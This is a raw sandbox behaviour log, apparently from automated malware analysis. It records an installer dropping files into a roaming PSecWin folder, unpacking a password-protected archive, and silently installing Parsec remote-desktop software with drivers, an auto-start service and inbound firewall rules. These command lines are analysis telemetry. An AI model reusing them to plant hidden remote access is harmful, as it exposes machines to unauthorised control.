Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\nsExec.dll
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-KU5LP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-3JPOJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-VK3B0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-M8LS1.tmp
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-R541B.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbdibm02.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-514OT.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsDialogs.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\System.dll
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET614C.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-66C2H.tmp
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\System.dll
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-OGENO.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\parsecd.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-IH0UT.tmp
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeAPI coverage: 5.1 %
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeAPI coverage: 5.5 %
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeAPI coverage: 7.6 %
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeAPI coverage: 9.4 %
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp TID: 6552Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp TID: 6508Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Parsec\pservice.exe TID: 5896Thread sleep time: -90000s >= -30000s
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe TID: 2836Thread sleep count: 81 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F78318 FindFirstFileW,FindFirstFileW,free,6_2_00F78318
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_00405C49
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_00406873 FindFirstFileW,FindClose,13_2_00406873
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 13_2_0040290B FindFirstFileW,13_2_0040290B
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD04A89C FindFirstFileExW,39_2_00007FF7CD04A89C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,45_2_00405C49
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_00406873 FindFirstFileW,FindClose,45_2_00406873
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 45_2_0040290B FindFirstFileW,45_2_0040290B
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C348EE4 FindFirstFileExW,48_2_00007FF72C348EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD85E4 FindFirstFileExW,51_2_00007FF7E5AD85E4
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,65_2_00405C49
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_00406873 FindFirstFileW,FindClose,65_2_00406873
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_0040290B FindFirstFileW,65_2_0040290B
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181985E4 FindFirstFileExW,71_2_00007FF6181985E4
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F79414 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,6_2_00F79414
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00F7C7DC GetSystemInfo,6_2_00F7C7DC
Source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WindowsAzure Stack HCIHyper-V ServerWe were expecting an Os, Build and Service Pack field but we didn't get one
Source: uu8v4UUzTU.tmp, 00000002.00000002.2293815599.000000000372E000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000002.00000003.2286699133.0000000003720000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3287357243.000001F011ACC000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.2531612650.000001F0112B2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000002.3286874234.000001F0112B2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3138509714.000001F011ACB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000027.00000003.3137674102.000001F0112B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: pservice.exe, 00000027.00000002.3287357243.000001F011ACC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
Source: uu8v4UUzTU.tmp, 00000002.00000003.2287035653.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: onecore\base\ngscb\tpmhli\lib\pcrs.cppAMDAtmelATMLBroadcomBRCMCiscoCSCOFlySliceFLYSGoogleGOOGHPEIBMInfineonIFXIntelINTCLenovoLENMicrochipMCHPMicrosoftMSFTNational SemiconductorNSM NationzNTZNuvoton TechnologyNTCQualcommQCOMFuzhou RockchipROCCSMSCST MicroelectronicsSTM SamsungSMSNSinosunSNSTexas InstrumentTXNVMWareVMWWinbondWECTPM_PT_FAMILY_INDICATORTPM_PT_LEVELTPM_PT_REVISIONTPM_PT_DAY_OF_YEARTPM_PT_YEARTPM_PT_MANUFACTURERTPM_PT_VENDOR_STRING_1TPM_PT_VENDOR_STRING_2TPM_PT_VENDOR_STRING_3TPM_PT_VENDOR_STRING_4TPM_PT_VENDOR_TPM_TYPETPM_PT_FIRMWARE_VERSION_1TPM_PT_FIRMWARE_VERSION_2TPM_PT_INPUT_BUFFERTPM_PT_HR_TRANSIENT_MINTPM_PT_HR_PERSISTENT_MINTPM_PT_HR_LOADED_MINTPM_PT_ACTIVE_SESSIONS_MAXTPM_PT_PCR_COUNTTPM_PT_PCR_SELECT_MINTPM_PT_CONTEXT_GAP_MAXTPM_PT_NV_COUNTERS_MAXTPM_PT_NV_INDEX_MAXTPM_PT_MEMORYTPM_PT_CLOCK_UPDATETPM_PT_CONTEXT_HASHTPM_PT_CONTEXT_SYMTPM_PT_CONTEXT_SYM_SIZETPM_PT_ORDERLY_COUNTTPM_PT_MAX_COMMAND_SIZETPM_PT_MAX_RESPONSE_SIZETPM_PT_MAX_DIGESTTPM_PT_MAX_OBJECT_CONTEXTTPM_PT_MAX_SESSION_CONTEXTTPM_PT_PS_FAMILY_INDICATORTPM_PT_PS_LEVELTPM_PT_PS_REVISIONTPM_PT_PS_DAY_OF_YEARTPM_PT_PS_YEARTPM_PT_SPLIT_MAXTPM_PT_TOTAL_COMMANDSTPM_PT_LIBRARY_COMMANDSTPM_PT_VENDOR_COMMANDSTPM_PT_NV_BUFFER_MAXTPM_PT_MODESTPM_PT_MAX_CAP_BUFFERTPM_PT_PERMANENTTPM_PT_STARTUP_CLEARTPM_PT_HR_NV_INDEXTPM_PT_HR_LOADEDTPM_PT_HR_LOADED_AVAILTPM_PT_HR_ACTIVETPM_PT_HR_ACTIVE_AVAILTPM_PT_HR_TRANSIENT_AVAILTPM_PT_HR_PERSISTENTTPM_PT_HR_PERSISTENT_AVAILTPM_PT_NV_COUNTERSTPM_PT_NV_COUNTERS_AVAILTPM_PT_ALGORITHM_SETTPM_PT_LOADED_CURVESTPM_PT_LOCKOUT_COUNTERTPM_PT_MAX_AUTH_FAILTPM_PT_LOCKOUT_INTERVALTPM_PT_LOCKOUT_RECOVERYTPM_PT_NV_WRITE_RECOVERYTPM_PT_AUDIT_COUNTER_0TPM_PT_AUDIT_COUNTER_1TPM_HT_PCRTPM_HT_NV_INDEXTPM_HT_HMAC_SESSIONTPM_HT_LOADED_SESSIONTPM_HT_POLICY_SESSIONTPM_HT_SAVED_SESSIONTPM_HT_PERMANENTTPM_HT_TRANSIENTTPM_HT_PERSISTENTTPM_RH_FIRSTTPM_RH_SRKTPM_RH_OWNERTPM_RH_REVOKETPM_RH_TRANSPORTTPM_RH_OPERATORTPM_RH_ADMINTPM_RH_EKTPM_RH_NULLTPM_RH_UNASSIGNEDTPM_RH_PWTPM_RH_LOCKOUTTPM_RH_ENDORSEMENTTPM_RH_PLATFORMTPM_RH_PLATFORM_NVTPM_RH_AUTH_00TPM_RH_AUTH_FFTPM_RH_LASTTPM_INTEL_PROP_INTC_FLAGSTPM_ALG_RSATPM_ALG_SHA1TPM_ALG_HMACTPM_ALG_AESTPM_ALG_MGF1TPM_ALG_KEYEDHASHTPM_ALG_XORTPM_ALG_SHA256TPM_ALG_SHA384TPM_ALG_SHA512TPM_ALG_NULLTPM_ALG_SM3_256TPM_ALG_SM4TPM_ALG_RSASSATPM_ALG_RSAESTPM_ALG_RSAPSSTPM_ALG_OAEPTPM_ALG_ECDSATPM_ALG_ECDHTPM_ALG_KDF1_SP800_108TPM_ALG_ECCTPM_ALG_SYMCIPHERTPM_ALG_SHA3_256TPM_ALG_SHA3_384TPM_ALG_SHA3_512TPM_ALG_CTRTPM_ALG_OFBTPM_ALG_CBCTPM_ALG_CFBTPM_ALG_ECBTPM2_NV_UndefineSpaceSpecialTPM2_EvictControlTPM2_HierarchyControlTPM2_NV_UndefineSpaceTPM2_ChangeEPSTPM2_ChangePPSTPM2_ClearTPM2_ClearControlTPM2_ClockSetTPM2_HierarchyChangeAuthTPM2_NV_DefineSpaceTPM2_PCR_AllocateTPM2_PCR_SetAuthPolicyTPM2_PP_CommandsTPM2_SetPrimaryPolicyTPM2_FieldUpgradeStartTPM2_ClockRateAdjustTPM2_CreatePrimaryTPM2_NV_GlobalWriteLockTPM2_GetCommandAuditDigestTPM2_NV_IncrementTPM2_NV_SetBitsTPM2_NV_ExtendTPM2_NV_WriteTPM2_NV_WriteLockTPM2_DictionaryAttackLockResetT
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeAPI call chain: ExitProcess graph end node
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeAPI call chain: ExitProcess graph end node
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpProcess information queried: ProcessInformation
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD0470C8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00007FF7CD0470C8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FC6550 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,fputs,fputs,6_2_00FC6550
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD040D20 GetProcessHeap,39_2_00007FF7CD040D20
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD047274 SetUnhandledExceptionFilter,39_2_00007FF7CD047274
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD046D74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00007FF7CD046D74
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD0470C8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00007FF7CD0470C8
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD03B0C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_00007FF7CD03B0C4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C327050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,48_2_00007FF72C327050
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3318AC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF72C3318AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3272FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,48_2_00007FF72C3272FC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C3274A4 SetUnhandledExceptionFilter,48_2_00007FF72C3274A4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AB6840 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,51_2_00007FF7E5AB6840
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC10DC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_00007FF7E5AC10DC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AB6AEC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,51_2_00007FF7E5AB6AEC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AB6CD0 SetUnhandledExceptionFilter,51_2_00007FF7E5AB6CD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618176AEC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,71_2_00007FF618176AEC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618176CD0 SetUnhandledExceptionFilter,71_2_00007FF618176CD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181810DC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,71_2_00007FF6181810DC
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618176840 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,71_2_00007FF618176840
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" stop Parsec
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" delete Parsec
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start Parsec
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vusb\parsec-vud.exe "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -o
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec\vdd\parsec-vdd.exe "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "winsta0\default" "0000000000000160" "208" "c:\program files\parsec virtual usb adapter driver\parsecvusba"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "winsta0\default" "0000000000000158" "208" "c:\program files\parsec virtual usb adapter driver\parsecvirtualds"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "winsta0\default" "0000000000000160" "208" "c:\program files\parsec virtual usb adapter driver\parsecvusba"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe drvinst.exe "4" "0" "c:\users\user\appdata\local\temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "winsta0\default" "0000000000000158" "208" "c:\program files\parsec virtual usb adapter driver\parsecvirtualds"
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD032130 SHGetKnownFolderPath,CoTaskMemFree,RegisterServiceCtrlHandlerExW,SetServiceStatus,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,GetLastError,SetServiceStatus,SetServiceStatus,ConnectNamedPipe,GetLastError,GetNamedPipeClientProcessId,ProcessIdToSessionId,WTSGetActiveConsoleSessionId,OpenProcess,QueryFullProcessImageNameW,CloseHandle,OpenProcess,OpenProcessToken,SHGetKnownFolderPath,CoTaskMemFree,CloseHandle,CloseHandle,ReadFile,WriteFile,DisconnectNamedPipe,EnterCriticalSection,GetExitCodeProcess,CloseHandle,LeaveCriticalSection,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,SendSAS,RegCloseKey,OpenProcess,WriteFile,DisconnectNamedPipe,CloseHandle,CloseHandle,SetServiceStatus,39_2_00007FF7CD032130
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 6_2_00FCE460 cpuid 6_2_00FCE460
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,48_2_00007FF72C34CEEC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,48_2_00007FF72C344FBC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,48_2_00007FF72C34D934
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,48_2_00007FF72C34D5F8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,48_2_00007FF72C34D750
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,48_2_00007FF72C34D800
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,48_2_00007FF72C34D248
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: EnumSystemLocalesW,48_2_00007FF72C34D318
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,48_2_00007FF72C34D3B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: GetLocaleInfoW,48_2_00007FF72C34543C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,51_2_00007FF7E5AD46BC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,51_2_00007FF7E5ADC690
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,51_2_00007FF7E5ADC5F8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: EnumSystemLocalesW,51_2_00007FF7E5ADC528
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: GetLocaleInfoW,51_2_00007FF7E5ADC8D8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,51_2_00007FF7E5ADC1CC
